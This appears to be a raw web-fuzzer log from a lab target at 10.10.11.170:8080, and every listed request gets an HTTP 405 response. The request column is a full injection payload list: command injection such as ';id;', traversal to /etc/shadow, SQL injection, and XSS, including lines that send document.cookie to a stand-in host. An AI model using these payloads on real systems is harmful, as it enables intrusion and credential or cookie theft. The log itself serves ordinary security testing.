Target: http://10.10.11.170:8080/
Total requests: 468
==================================================================
ID    Response   Lines      Word         Chars          Request    
==================================================================
00001:  C=405      0 L	       3 W	    111 Ch	  "A"
00014:  C=405      0 L	       3 W	    111 Ch	  "268435455"
00016:  C=405      0 L	       3 W	    111 Ch	  "2147483647"
00015:  C=405      0 L	       3 W	    111 Ch	  "-268435455"
00003:  C=405      0 L	       3 W	    111 Ch	  "FALSE"
00017:  C=405      0 L	       3 W	    111 Ch	  "0xfffffff"
00018:  C=405      0 L	       3 W	    111 Ch	  "NULL"
00013:  C=405      0 L	       3 W	    111 Ch	  "65536"
00007:  C=405      0 L	       3 W	    111 Ch	  "-1"
00012:  C=405      0 L	       3 W	    111 Ch	  "-20"
00005:  C=405      0 L	       3 W	    111 Ch	  "00"
00011:  C=405      0 L	       3 W	    111 Ch	  "-2"
00010:  C=405      0 L	       3 W	    111 Ch	  "2"
00006:  C=405      0 L	       3 W	    111 Ch	  "1"
00008:  C=405      0 L	       3 W	    111 Ch	  "1.0"
00002:  C=405      0 L	       3 W	    111 Ch	  "TRUE"
00009:  C=405      0 L	       3 W	    111 Ch	  "-1.0"
00004:  C=405      0 L	       3 W	    111 Ch	  "0"
00021:  C=405      0 L	       3 W	    111 Ch	  "\00"
00019:  C=405      0 L	       3 W	    111 Ch	  "null"
00033:  C=405      0 L	       3 W	    111 Ch	  "$NULL"
00025:  C=405      0 L	       3 W	    111 Ch	  "+%00"
00039:  C=405      0 L	       3 W	    111 Ch	  "\nnetstat -a%\n"
00038:  C=405      0 L	       3 W	    111 Ch	  ";netstat -a;"
00040:  C=405      0 L	       3 W	    111 Ch	  "\"blah"
00037:  C=405      0 L	       3 W	    111 Ch	  ";read;"
00036:  C=405      0 L	       3 W	    111 Ch	  ";id;"
00034:  C=405      0 L	       3 W	    111 Ch	  "`id`"
00035:  C=405      0 L	       3 W	    111 Ch	  "`dir`"
00032:  C=405      0 L	       3 W	    111 Ch	  "$null"
00031:  C=405      0 L	       3 W	    111 Ch	  "\00\00\00"
00030:  C=405      0 L	       3 W	    111 Ch	  "\00\00"
00028:  C=405      0 L	       3 W	    111 Ch	  "\0\0\0"
00029:  C=405      0 L	       3 W	    111 Ch	  "\00"
00027:  C=405      0 L	       3 W	    111 Ch	  "\0\0"
00024:  C=405      0 L	       3 W	    111 Ch	  "%00"
00026:  C=405      0 L	       3 W	    111 Ch	  "\0"
00023:  C=405      0 L	       3 W	    111 Ch	  "%0a"
00022:  C=405      0 L	       3 W	    111 Ch	  "<  script > < / script>"
00020:  C=405      0 L	       3 W	    111 Ch	  "\0"
00041:  C=405      0 L	       3 W	    111 Ch	  "|id|"
00043:  C=405      0 L	       3 W	    111 Ch	  "id%00"
00071:  C=405      0 L	       3 W	    111 Ch	  "/../../../../../../../../../../etc/passwd^^"
00047:  C=405      0 L	       3 W	    111 Ch	  "|dir|"
00055:  C=405      0 L	       3 W	    111 Ch	  "?x=""
00079:  C=405      0 L	       3 W	    111 Ch	  "..\..\..\..\..\..\..\..\..\..\etc\passwd"
00078:  C=405      0 L	       3 W	    111 Ch	  "\..\..\..\..\..\..\..\..\..\..\etc\shadow"
00077:  C=405      0 L	       3 W	    111 Ch	  "\..\..\..\..\..\..\..\..\..\..\etc\passwd"
00076:  C=405      0 L	       3 W	    111 Ch	  "/./././././././././././etc/shadow"
00075:  C=405      0 L	       3 W	    111 Ch	  "/./././././././././././etc/passwd"
00074:  C=405      0 L	       3 W	    111 Ch	  "/../../../../../../../../../../etc/shadow"
00073:  C=405      0 L	       3 W	    111 Ch	  "/../../../../../../../../../../etc/passwd"
00068:  C=405      0 L	       3 W	    111 Ch	  "../../../../../../../../../../../../etc/passwd"
00072:  C=405      0 L	       3 W	    111 Ch	  "/../../../../../../../../../../etc/shadow^^"
00070:  C=405      0 L	       3 W	    111 Ch	  "../../../../../../../../../../../../etc/shadow"
00069:  C=405      0 L	       3 W	    111 Ch	  "../../../../../../../../../../../../etc/shadow%00"
00066:  C=405      0 L	       3 W	    111 Ch	  "/../../../../../../../../%2A"
00065:  C=405      0 L	       3 W	    111 Ch	  "../../boot.ini"
00063:  C=405      0 L	       3 W	    111 Ch	  "../../../../../../../../../../../../etc/hosts%00"
00064:  C=405      0 L	       3 W	    111 Ch	  "../../../../../../../../../../../../etc/hosts"
00067:  C=405      0 L	       3 W	    111 Ch	  "../../../../../../../../../../../../etc/passwd%00"
00062:  C=405      0 L	       3 W	    111 Ch	  "ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|"
00061:  C=405      0 L	       3 W	    111 Ch	  "/etc/shadow"
00060:  C=405      0 L	       3 W	    111 Ch	  "/etc/passwd"
00059:  C=405      0 L	       3 W	    111 Ch	  "/boot.ini"
00058:  C=405      0 L	       3 W	    111 Ch	  "/index.html|id|"
00057:  C=405      0 L	       3 W	    111 Ch	  "?x=>"
00053:  C=405      0 L	       3 W	    111 Ch	  "\n/bin/ls -al\n"
00054:  C=405      0 L	       3 W	    111 Ch	  "?x="
00056:  C=405      0 L	       3 W	    111 Ch	  "?x=|"
00052:  C=405      0 L	       3 W	    111 Ch	  "|/bin/ls -al"
00050:  C=405      0 L	       3 W	    111 Ch	  ";ls -la"
00051:  C=405      0 L	       3 W	    111 Ch	  ";dir"
00046:  C=405      0 L	       3 W	    111 Ch	  "|dir"
00048:  C=405      0 L	       3 W	    111 Ch	  "|ls"
00049:  C=405      0 L	       3 W	    111 Ch	  "|ls -la"
00045:  C=405      0 L	       3 W	    111 Ch	  "|id"
00044:  C=405      0 L	       3 W	    111 Ch	  "id%00|"
00042:  C=405      0 L	       3 W	    111 Ch	  "&quot;;id&quot;"
00080:  C=405      0 L	       3 W	    111 Ch	  "..\..\..\..\..\..\..\..\..\..\etc\shadow"
00082:  C=405      0 L	       3 W	    111 Ch	  "/..\../..\../..\../..\../..\../..\../etc/shadow"
00086:  C=405      0 L	       3 W	    111 Ch	  "\..\..\..\..\..\..\..\..\..\..\etc\shadow%00"
00094:  C=405      0 L	       3 W	    111 Ch	  "%00../../../../../../etc/shadow"
00100:  C=405      0 L	       3 W	    111 Ch	  "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow"
00101:  C=405      0 L	       3 W	    111 Ch	  "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00"
00099:  C=405      0 L	       3 W	    111 Ch	  "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
00097:  C=405      0 L	       3 W	    111 Ch	  "/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd"
00098:  C=405      0 L	       3 W	    111 Ch	  "/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow"
00096:  C=405      0 L	       3 W	    111 Ch	  "/../../../../../../../../../../../etc/passwd%00.html"
00095:  C=405      0 L	       3 W	    111 Ch	  "/../../../../../../../../../../../etc/passwd%00.jpg"
00093:  C=405      0 L	       3 W	    111 Ch	  "%00../../../../../../etc/passwd"
00092:  C=405      0 L	       3 W	    111 Ch	  "%00/etc/shadow%00"
00091:  C=405      0 L	       3 W	    111 Ch	  "%00/etc/passwd%00"
00090:  C=405      0 L	       3 W	    111 Ch	  "%0a/bin/cat%20/etc/shadow"
00089:  C=405      0 L	       3 W	    111 Ch	  "%0a/bin/cat%20/etc/passwd"
00088:  C=405      0 L	       3 W	    111 Ch	  "..\..\..\..\..\..\..\..\..\..\etc\shadow%00"
00085:  C=405      0 L	       3 W	    111 Ch	  "\..\..\..\..\..\..\..\..\..\..\etc\passwd%00"
00087:  C=405      0 L	       3 W	    111 Ch	  "..\..\..\..\..\..\..\..\..\..\etc\passwd%00"
00081:  C=405      0 L	       3 W	    111 Ch	  "/..\../..\../..\../..\../..\../..\../etc/passwd"
00084:  C=405      0 L	       3 W	    111 Ch	  ".\\./.\\./.\\./.\\./.\\./.\\./etc/shadow"
00083:  C=405      0 L	       3 W	    111 Ch	  ".\\./.\\./.\\./.\\./.\\./.\\./etc/passwd"
00102:  C=405      0 L	       3 W	    111 Ch	  "/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00"
00104:  C=405      0 L	       3 W	    111 Ch	  "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%		25%5c..%25%5c..%255cboot.ini"
00116:  C=405      0 L	       3 W	    111 Ch	  "../../../../../../../../../../../../boot.ini%00"
00132:  C=405      0 L	       3 W	    111 Ch	  "!@#0%^#0##018387@#0^^**(()"
00108:  C=405      0 L	       3 W	    111 Ch	  "../../../../../../../../conf/server.xml"
00148:  C=405      0 L	       3 W	    111 Ch	  "&lt"
00151:  C=405      0 L	       3 W	    111 Ch	  "&LT;"
00150:  C=405      0 L	       3 W	    111 Ch	  "&LT"
00147:  C=405      0 L	       3 W	    111 Ch	  "\\\\?\\"
00149:  C=405      0 L	       3 W	    111 Ch	  "&lt;"
00146:  C=405      0 L	       3 W	    111 Ch	  "\\\\*"
00145:  C=405      0 L	       3 W	    111 Ch	  "\\/"
00144:  C=405      0 L	       3 W	    111 Ch	  "\\"
00143:  C=405      0 L	       3 W	    111 Ch	  "\"
00142:  C=405      0 L	       3 W	    111 Ch	  "/"
00140:  C=405      0 L	       3 W	    111 Ch	  "}"
00141:  C=405      0 L	       3 W	    111 Ch	  ";"
00139:  C=405      0 L	       3 W	    111 Ch	  "*"
00138:  C=405      0 L	       3 W	    111 Ch	  "#"
00137:  C=405      0 L	       3 W	    111 Ch	  "%"
00136:  C=405      0 L	       3 W	    111 Ch	  "&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;"
00135:  C=405      0 L	       3 W	    111 Ch	  "&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;"
00134:  C=405      0 L	       3 W	    111 Ch	  "/,%ENV,/"
00131:  C=405      0 L	       3 W	    111 Ch	  "%0d%0aX-Injection-Header:%20AttackValue"
00133:  C=405      0 L	       3 W	    111 Ch	  "%01%02%03%04%0a%0d%0aADSF"
00130:  C=405      0 L	       3 W	    111 Ch	  "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini"
00129:  C=405      0 L	       3 W	    111 Ch	  "..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini"
00127:  C=405      0 L	       3 W	    111 Ch	  "/../../../../../../../../../../../boot.ini%00.jpg"
00126:  C=405      0 L	       3 W	    111 Ch	  "/../../../../../../../../../../../boot.ini%00.html"
00128:  C=405      0 L	       3 W	    111 Ch	  "/.../.../.../.../.../"
00125:  C=405      0 L	       3 W	    111 Ch	  "..\..\..\..\..\..\..\..\..\..\boot.ini"
00124:  C=405      0 L	       3 W	    111 Ch	  "..\..\..\..\..\..\..\..\..\..\boot.ini%00"
00123:  C=405      0 L	       3 W	    111 Ch	  "\..\..\..\..\..\..\..\..\..\..\boot.ini"
00122:  C=405      0 L	       3 W	    111 Ch	  "/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini"
00121:  C=405      0 L	       3 W	    111 Ch	  "/..\../..\../..\../..\../..\../..\../boot.ini"
00120:  C=405      0 L	       3 W	    111 Ch	  "/../../../../../../../../../../../boot.ini"
00119:  C=405      0 L	       3 W	    111 Ch	  "/../../../../../../../../../../../boot.ini%00"
00118:  C=405      0 L	       3 W	    111 Ch	  "/./././././././././././boot.ini"
00114:  C=405      0 L	       3 W	    111 Ch	  "../../../../../../../../../../../../localstart.asp%00"
00115:  C=405      0 L	       3 W	    111 Ch	  "../../../../../../../../../../../../localstart.asp"
00117:  C=405      0 L	       3 W	    111 Ch	  "../../../../../../../../../../../../boot.ini"
00113:  C=405      0 L	       3 W	    111 Ch	  "C:\boot.ini"
00112:  C=405      0 L	       3 W	    111 Ch	  "C:/boot.ini"
00110:  C=405      0 L	       3 W	    111 Ch	  "C:/inetpub/wwwroot/global.asa"
00111:  C=405      0 L	       3 W	    111 Ch	  "C:\inetpub\wwwroot\global.asa"
00107:  C=405      0 L	       3 W	    111 Ch	  "\\&apos;/bin/cat%20/etc/shadow\\&apos;"
00109:  C=405      0 L	       3 W	    111 Ch	  "/../../../../../../../../bin/id|"
00106:  C=405      0 L	       3 W	    111 Ch	  "\\&apos;/bin/cat%20/etc/passwd\\&apos;"
00152:  C=405      0 L	       3 W	    111 Ch	  "<"
00103:  C=405      0 L	       3 W	    111 Ch	  "%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%	25%5c..%25%5c..%00"
00105:  C=405      0 L	       3 W	    111 Ch	  "/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini"
00154:  C=405      0 L	       3 W	    111 Ch	  "<<<"
00176:  C=405      0 L	       3 W	    111 Ch	  "&#13;"
00158:  C=405      0 L	       3 W	    111 Ch	  "-"
00175:  C=405      0 L	       3 W	    111 Ch	  "&#10;"
00166:  C=405      0 L	       3 W	    111 Ch	  "{'}"
00174:  C=405      0 L	       3 W	    111 Ch	  ""\t""
00173:  C=405      0 L	       3 W	    111 Ch	  "\t"
00170:  C=405      0 L	       3 W	    111 Ch	  "!'"
00172:  C=405      0 L	       3 W	    111 Ch	  "%01%02%03%04%0a%0d%0aADSF"
00171:  C=405      0 L	       3 W	    111 Ch	  "!@#$%%^#$%#$@#$%$$@#$%^^**(()"
00168:  C=405      0 L	       3 W	    111 Ch	  "*'"
00167:  C=405      0 L	       3 W	    111 Ch	  "[']"
00169:  C=405      0 L	       3 W	    111 Ch	  "#'"
00165:  C=405      0 L	       3 W	    111 Ch	  "(')"
00164:  C=405      0 L	       3 W	    111 Ch	  "@'"
00162:  C=405      0 L	       3 W	    111 Ch	  "\'"
00163:  C=405      0 L	       3 W	    111 Ch	  "/'"
00161:  C=405      0 L	       3 W	    111 Ch	  "^'"
00157:  C=405      0 L	       3 W	    111 Ch	  "`"
00159:  C=405      0 L	       3 W	    111 Ch	  "--"
00160:  C=405      0 L	       3 W	    111 Ch	  "*|"
00156:  C=405      0 L	       3 W	    111 Ch	  "||"
00153:  C=405      0 L	       3 W	    111 Ch	  "<<"
00177:  C=405      0 L	       3 W	    111 Ch	  "&#10;&#13;"
00155:  C=405      0 L	       3 W	    111 Ch	  "|"
00179:  C=405      0 L	       3 W	    111 Ch	  "#xD"
00183:  C=405      0 L	       3 W	    111 Ch	  "/%00/"
00191:  C=405      0 L	       3 W	    111 Ch	  "%5C/"
00207:  C=405      0 L	       3 W	    111 Ch	  "..%5c"
00220:  C=405      0 L	       3 W	    111 Ch	  "&#060;"
00221:  C=405      0 L	       3 W	    111 Ch	  "&#0060;"
00219:  C=405      0 L	       3 W	    111 Ch	  "&#60;"
00218:  C=405      0 L	       3 W	    111 Ch	  "&#0000060"
00216:  C=405      0 L	       3 W	    111 Ch	  "&#00060"
00217:  C=405      0 L	       3 W	    111 Ch	  "&#000060"
00215:  C=405      0 L	       3 W	    111 Ch	  "&#0060"
00214:  C=405      0 L	       3 W	    111 Ch	  "&#060"
00213:  C=405      0 L	       3 W	    111 Ch	  "&#60"
00212:  C=405      0 L	       3 W	    111 Ch	  "..%u2216"
00211:  C=405      0 L	       3 W	    111 Ch	  "..%25%35%63"
00210:  C=405      0 L	       3 W	    111 Ch	  "..%%35%63"
00209:  C=405      0 L	       3 W	    111 Ch	  "..%255c"
00206:  C=405      0 L	       3 W	    111 Ch	  "..\"
00208:  C=405      0 L	       3 W	    111 Ch	  "..%%35c"
00204:  C=405      0 L	       3 W	    111 Ch	  "..%c0%af"
00205:  C=405      0 L	       3 W	    111 Ch	  "..%bg%qf"
00203:  C=405      0 L	       3 W	    111 Ch	  "..%u2215"
00202:  C=405      0 L	       3 W	    111 Ch	  "%2e%2e%2f"
00201:  C=405      0 L	       3 W	    111 Ch	  "../"
00200:  C=405      0 L	       3 W	    111 Ch	  "%2500"
00199:  C=405      0 L	       3 W	    111 Ch	  "%250a"
00197:  C=405      0 L	       3 W	    111 Ch	  "%20"
00196:  C=405      0 L	       3 W	    111 Ch	  "%2C"
00198:  C=405      0 L	       3 W	    111 Ch	  "%20|"
00194:  C=405      0 L	       3 W	    111 Ch	  "/%2A"
00195:  C=405      0 L	       3 W	    111 Ch	  "%2A"
00193:  C=405      0 L	       3 W	    111 Ch	  "%00"
00190:  C=405      0 L	       3 W	    111 Ch	  "%5C"
00192:  C=405      0 L	       3 W	    111 Ch	  "%7C"
00189:  C=405      0 L	       3 W	    111 Ch	  "%60"
00188:  C=405      0 L	       3 W	    111 Ch	  "%3C%3F"
00187:  C=405      0 L	       3 W	    111 Ch	  "%3C"
00186:  C=405      0 L	       3 W	    111 Ch	  "<?"
00182:  C=405      0 L	       3 W	    111 Ch	  "#xA#xD"
00185:  C=405      0 L	       3 W	    111 Ch	  "%00"
00181:  C=405      0 L	       3 W	    111 Ch	  "#xD#xA"
00180:  C=405      0 L	       3 W	    111 Ch	  "#xA"
00222:  C=405      0 L	       3 W	    111 Ch	  "&#00060;"
00184:  C=405      0 L	       3 W	    111 Ch	  "%00/"
00178:  C=405      0 L	       3 W	    111 Ch	  "&#13;&#10;"
00224:  C=405      0 L	       3 W	    111 Ch	  "&#0000060;"
00245:  C=405      0 L	       3 W	    111 Ch	  "&#X003c;"
00228:  C=405      0 L	       3 W	    111 Ch	  "&#x0003c"
00244:  C=405      0 L	       3 W	    111 Ch	  "&#X03c;"
00236:  C=405      0 L	       3 W	    111 Ch	  "&#x000003c;"
00243:  C=405      0 L	       3 W	    111 Ch	  "&#X3c;"
00240:  C=405      0 L	       3 W	    111 Ch	  "&#X0003c"
00238:  C=405      0 L	       3 W	    111 Ch	  "&#X03c"
00241:  C=405      0 L	       3 W	    111 Ch	  "&#X00003c"
00242:  C=405      0 L	       3 W	    111 Ch	  "&#X000003c"
00239:  C=405      0 L	       3 W	    111 Ch	  "&#X003c"
00237:  C=405      0 L	       3 W	    111 Ch	  "&#X3c"
00235:  C=405      0 L	       3 W	    111 Ch	  "&#x00003c;"
00234:  C=405      0 L	       3 W	    111 Ch	  "&#x0003c;"
00233:  C=405      0 L	       3 W	    111 Ch	  "&#x003c;"
00232:  C=405      0 L	       3 W	    111 Ch	  "&#x03c;"
00231:  C=405      0 L	       3 W	    111 Ch	  "&#x3c;"
00227:  C=405      0 L	       3 W	    111 Ch	  "&#x003c"
00230:  C=405      0 L	       3 W	    111 Ch	  "&#x000003c"
00229:  C=405      0 L	       3 W	    111 Ch	  "&#x00003c"
00226:  C=405      0 L	       3 W	    111 Ch	  "&#x03c"
00225:  C=405      0 L	       3 W	    111 Ch	  "&#x3c"
00223:  C=405      0 L	       3 W	    111 Ch	  "&#000060;"
00246:  C=405      0 L	       3 W	    111 Ch	  "&#X0003c;"
00248:  C=405      0 L	       3 W	    111 Ch	  "&#X000003c;"
00252:  C=405      0 L	       3 W	    111 Ch	  "&#x0003C"
00260:  C=405      0 L	       3 W	    111 Ch	  "&#x000003C;"
00268:  C=405      0 L	       3 W	    111 Ch	  "&#X03C;"
00265:  C=405      0 L	       3 W	    111 Ch	  "&#X00003C"
00267:  C=405      0 L	       3 W	    111 Ch	  "&#X3C;"
00266:  C=405      0 L	       3 W	    111 Ch	  "&#X000003C"
00264:  C=405      0 L	       3 W	    111 Ch	  "&#X0003C"
00263:  C=405      0 L	       3 W	    111 Ch	  "&#X003C"
00262:  C=405      0 L	       3 W	    111 Ch	  "&#X03C"
00259:  C=405      0 L	       3 W	    111 Ch	  "&#x00003C;"
00261:  C=405      0 L	       3 W	    111 Ch	  "&#X3C"
00258:  C=405      0 L	       3 W	    111 Ch	  "&#x0003C;"
00257:  C=405      0 L	       3 W	    111 Ch	  "&#x003C;"
00256:  C=405      0 L	       3 W	    111 Ch	  "&#x03C;"
00255:  C=405      0 L	       3 W	    111 Ch	  "&#x3C;"
00254:  C=405      0 L	       3 W	    111 Ch	  "&#x000003C"
00251:  C=405      0 L	       3 W	    111 Ch	  "&#x003C"
00253:  C=405      0 L	       3 W	    111 Ch	  "&#x00003C"
00250:  C=405      0 L	       3 W	    111 Ch	  "&#x03C"
00247:  C=405      0 L	       3 W	    111 Ch	  "&#X00003c;"
00269:  C=405      0 L	       3 W	    111 Ch	  "&#X003C;"
00249:  C=405      0 L	       3 W	    111 Ch	  "&#x3C"
00271:  C=405      0 L	       3 W	    111 Ch	  "&#X00003C;"
00275:  C=405      0 L	       3 W	    111 Ch	  "\u003c"
00283:  C=405      0 L	       3 W	    111 Ch	  "{&apos;}"
00292:  C=405      0 L	       3 W	    111 Ch	  "'><script>alert(document.cookie)</script>"
00291:  C=405      0 L	       3 W	    111 Ch	  "<script>alert(document.cookie)</script>"
00288:  C=405      0 L	       3 W	    111 Ch	  ""><script>""
00290:  C=405      0 L	       3 W	    111 Ch	  "<<script>alert("XSS");//<</script>"
00289:  C=405      0 L	       3 W	    111 Ch	  "<script>alert("XSS")</script>"
00286:  C=405      0 L	       3 W	    111 Ch	  "#&apos;"
00287:  C=405      0 L	       3 W	    111 Ch	  "">xxx<P>yyy"
00285:  C=405      0 L	       3 W	    111 Ch	  "*&apos;"
00284:  C=405      0 L	       3 W	    111 Ch	  "[&apos;]"
00282:  C=405      0 L	       3 W	    111 Ch	  "@&apos;"
00280:  C=405      0 L	       3 W	    111 Ch	  "\&apos;"
00281:  C=405      0 L	       3 W	    111 Ch	  "^&apos;"
00279:  C=405      0 L	       3 W	    111 Ch	  "/&apos;"
00278:  C=405      0 L	       3 W	    111 Ch	  "&apos;"
00277:  C=405      0 L	       3 W	    111 Ch	  "something%00html"
00276:  C=405      0 L	       3 W	    111 Ch	  "\u003C"
00274:  C=405      0 L	       3 W	    111 Ch	  "\x3C"
00273:  C=405      0 L	       3 W	    111 Ch	  "\x3c"
00270:  C=405      0 L	       3 W	    111 Ch	  "&#X0003C;"
00272:  C=405      0 L	       3 W	    111 Ch	  "&#X000003C;"
00293:  C=405      0 L	       3 W	    111 Ch	  "'><script>alert(document.cookie);</script>"
00295:  C=405      0 L	       3 W	    111 Ch	  "%3cscript%3ealert("XSS");%3c/script%3e"
00299:  C=405      0 L	       3 W	    111 Ch	  "&ltscript&gtalert(document.cookie);&ltscript&gtalert"
00313:  C=405      0 L	       3 W	    111 Ch	  "<IMG SRC="jav&#x0A;ascript:alert('XSS');">"
00306:  C=405      0 L	       3 W	    111 Ch	  "<IMG SRC=javascript:alert(&quot;XSS&quot;)>"
00307:  C=405      0 L	       3 W	    111 Ch	  "<IMG SRC=`javascript:alert("'XSS'")`>"
00305:  C=405      0 L	       3 W	    111 Ch	  "<IMG SRC=JaVaScRiPt:alert('XSS')>"
00312:  C=405      0 L	       3 W	    111 Ch	  "<IMG SRC="jav&#x09;ascript:alert('XSS');">"
00309:  C=405      0 L	       3 W	    111 Ch	  "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>"
00308:  C=405      0 L	       3 W	    111 Ch	  "<IMG """><SCRIPT>alert("XSS")</SCRIPT>">"
00311:  C=405      0 L	       3 W	    111 Ch	  "<IMG SRC="jav	ascript:alert('XSS');">"
00304:  C=405      0 L	       3 W	    111 Ch	  "<IMG SRC=javascript:alert('XSS')>"
00310:  C=405      0 L	       3 W	    111 Ch	  "<IMG%20SRC='javasc	ript:alert(document.cookie)'>"
00303:  C=405      0 L	       3 W	    111 Ch	  "<IMG SRC="javascript:alert('XSS')""
00302:  C=405      0 L	       3 W	    111 Ch	  "<IMG SRC="javascript:alert('XSS');">"
00298:  C=405      0 L	       3 W	    111 Ch	  "&ltscript&gtalert(document.cookie);</script>"
00297:  C=405      0 L	       3 W	    111 Ch	  "%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E"
00301:  C=405      0 L	       3 W	    111 Ch	  "<IMG%20SRC='javascript:alert(document.cookie)'>"
00300:  C=405      0 L	       3 W	    111 Ch	  "<xss><script>alert('XSS')</script></vulnerable>"
00294:  C=405      0 L	       3 W	    111 Ch	  "\";alert('XSS');//"
00296:  C=405      0 L	       3 W	    111 Ch	  "%3cscript%3ealert(document.cookie);%3c%2fscript%3e"
00314:  C=405      0 L	       3 W	    111 Ch	  "<IMG SRC="jav&#x0D;ascript:alert('XSS');">"
00320:  C=405      0 L	       3 W	    111 Ch	  "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>"
00316:  C=405      0 L	       3 W	    111 Ch	  "<IMG DYNSRC="javascript:alert('XSS')">"
00328:  C=405      0 L	       3 W	    111 Ch	  "'"
00332:  C=405      0 L	       3 W	    111 Ch	  "--"
00327:  C=405      0 L	       3 W	    111 Ch	  "http://10.10.11.170:8080/"
00333:  C=405      0 L	       3 W	    111 Ch	  "' --"
00331:  C=405      0 L	       3 W	    111 Ch	  "-"
00329:  C=405      0 L	       3 W	    111 Ch	  """
00330:  C=405      0 L	       3 W	    111 Ch	  "#"
00326:  C=405      0 L	       3 W	    111 Ch	  "'';!--"<XSS>=&{()}"
00324:  C=405      0 L	       3 W	    111 Ch	  "%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E"
00325:  C=405      0 L	       3 W	    111 Ch	  "';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}"
00323:  C=405      0 L	       3 W	    111 Ch	  ""><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>"
00319:  C=405      0 L	       3 W	    111 Ch	  "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>"
00322:  C=405      0 L	       3 W	    111 Ch	  "'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E"
00321:  C=405      0 L	       3 W	    111 Ch	  "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>"
00318:  C=405      0 L	       3 W	    111 Ch	  "<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>"
00315:  C=405      0 L	       3 W	    111 Ch	  "<IMG SRC=" &#14;  javascript:alert('XSS');">"
00334:  C=405      0 L	       3 W	    111 Ch	  "--';"
00317:  C=405      0 L	       3 W	    111 Ch	  "<IMG LOWSRC="javascript:alert('XSS')">"
00336:  C=405      0 L	       3 W	    111 Ch	  "= '"
00354:  C=405      0 L	       3 W	    111 Ch	  "" or 0=0 --"
00340:  C=405      0 L	       3 W	    111 Ch	  "\x27"
00349:  C=405      0 L	       3 W	    111 Ch	  "' or 'x'='x"
00350:  C=405      0 L	       3 W	    111 Ch	  "" or "x"="x"
00353:  C=405      0 L	       3 W	    111 Ch	  "' or 0=0 --"
00348:  C=405      0 L	       3 W	    111 Ch	  "' or ''='"
00352:  C=405      0 L	       3 W	    111 Ch	  "0 or 1=1"
00351:  C=405      0 L	       3 W	    111 Ch	  "') or ('x'='x"
00347:  C=405      0 L	       3 W	    111 Ch	  "<>"'%;)(&+"
00346:  C=405      0 L	       3 W	    111 Ch	  "admin'--"
00343:  C=405      0 L	       3 W	    111 Ch	  "\x27\x4F\x52 SELECT *"
00345:  C=405      0 L	       3 W	    111 Ch	  "'or select *"
00344:  C=405      0 L	       3 W	    111 Ch	  "\x27\x6F\x72 SELECT *"
00341:  C=405      0 L	       3 W	    111 Ch	  "\x3D \x3B'"
00339:  C=405      0 L	       3 W	    111 Ch	  "\x23"
00342:  C=405      0 L	       3 W	    111 Ch	  "\x3D \x27"
00338:  C=405      0 L	       3 W	    111 Ch	  "= --"
00335:  C=405      0 L	       3 W	    111 Ch	  "' ;"
00337:  C=405      0 L	       3 W	    111 Ch	  "= ;"
00357:  C=405      0 L	       3 W	    111 Ch	  "" or 0=0 #"
00355:  C=405      0 L	       3 W	    111 Ch	  "or 0=0 --"
00361:  C=405      0 L	       3 W	    111 Ch	  "' or '1'='1'--"
00369:  C=405      0 L	       3 W	    111 Ch	  "" or "a"="a"
00402:  C=405      0 L	       3 W	    111 Ch	  "' or uname like '%"
00385:  C=405      0 L	       3 W	    111 Ch	  "as"
00399:  C=405      0 L	       3 W	    111 Ch	  "handler"
00400:  C=405      0 L	       3 W	    111 Ch	  "bfilename"
00401:  C=405      0 L	       3 W	    111 Ch	  "' or username like '%"
00397:  C=405      0 L	       3 W	    111 Ch	  "replace"
